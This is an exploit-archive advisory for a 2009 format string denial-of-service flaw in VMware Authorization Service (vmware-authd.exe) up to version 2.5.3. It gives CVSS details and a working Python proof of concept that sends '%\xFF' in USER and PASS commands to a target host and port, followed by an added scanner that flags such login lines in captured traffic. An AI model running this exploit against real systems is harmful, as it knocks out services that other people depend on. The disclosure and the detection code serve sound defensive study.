VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS

2009.10.16
Credit: shinnai
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-134


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

# ----------------------------------------------------------------------------
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
# url: http://www.vmware.com/
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Tested on Windows XP Professional Ita SP3 full patched
# ----------------------------------------------------------------------------
# usage: C:\>exploit.py 127.0.0.1 912

import socket
import time
import sys

host = str(sys.argv[1])
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    conn = s.connect((host, port))
    d = s.recv(1024)
    print "Server <- " + d

    s.send('USER \x25\xFF \r\n')
    print 'Sending command "USER" + evil string...'
    d = s.recv(1024)
    print "Server response <- " + d

    s.send('PASS \x25\xFF \r\n')
    print 'Sending command "PASS" + evil string...'
    try:
        d = s.recv(1024)
        print "Server response <- " + d
    except:
        print "\nExploit completed..."
except:
    print "Something goes wrong honey..."

References:

http://www.shinnai.net/xplits/TXT_JtYUv6C6j5b6Bw6iIkF4.html
http://www.shinnai.net/index.php?mod=02_Forum&group=02_Bugs_and_Exploits&argument=01_Remote&topic=1254924405.ff.php
http://securitytracker.com/id?1022997
http://secunia.com/advisories/36988
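
A detection check for the traffic the PoC above produces, added here as an example and not part of the original advisory or of any VMware code: it scans a captured client-to-server byte stream for USER/PASS lines whose argument contains a printf-style directive or a "%" followed by a non-printable byte. The function name, the regular expression and the sample streams are constructed for illustration; the CRLF framing and the "%\xFF" argument are taken from the PoC, and case-insensitive command matching is an assumption.

```python
import re

# A printf-style directive (flags, width, precision, length, conversion), or
# '%' followed by a byte outside printable ASCII, as in the PoC's "\x25\xFF".
DIRECTIVE = re.compile(
    rb"%(?:[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|L|z|j|t)?[diouxXeEfgGaAcspn]"
    rb"|[^\x20-\x7e])"
)
COMMANDS = (b"USER", b"PASS")

# Constructed sample streams (client -> server bytes only).
BENIGN = b"USER alice\r\nPASS correct horse 100%\r\n"
POC = b"USER %\xff \r\nPASS %\xff \r\n"  # the two lines the PoC sends


def scan_client_stream(data):
    """Return (line_no, command, argument) for each suspicious login line."""
    findings = []
    for line_no, line in enumerate(data.split(b"\r\n"), start=1):
        command, _, argument = line.partition(b" ")
        # Only the two commands the advisory names are inspected.
        if command.upper() in COMMANDS and DIRECTIVE.search(argument):
            findings.append((line_no, command.upper().decode(), argument))
    return findings


if __name__ == "__main__":
    for name, stream in (("benign", BENIGN), ("poc", POC)):
        print(name, scan_client_stream(stream))
```

A password that happens to contain a sequence such as "%o" also matches, so a hit is a prompt for review, not proof of an attack. A trailing "%" with nothing after it, as in the benign sample, is not flagged.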

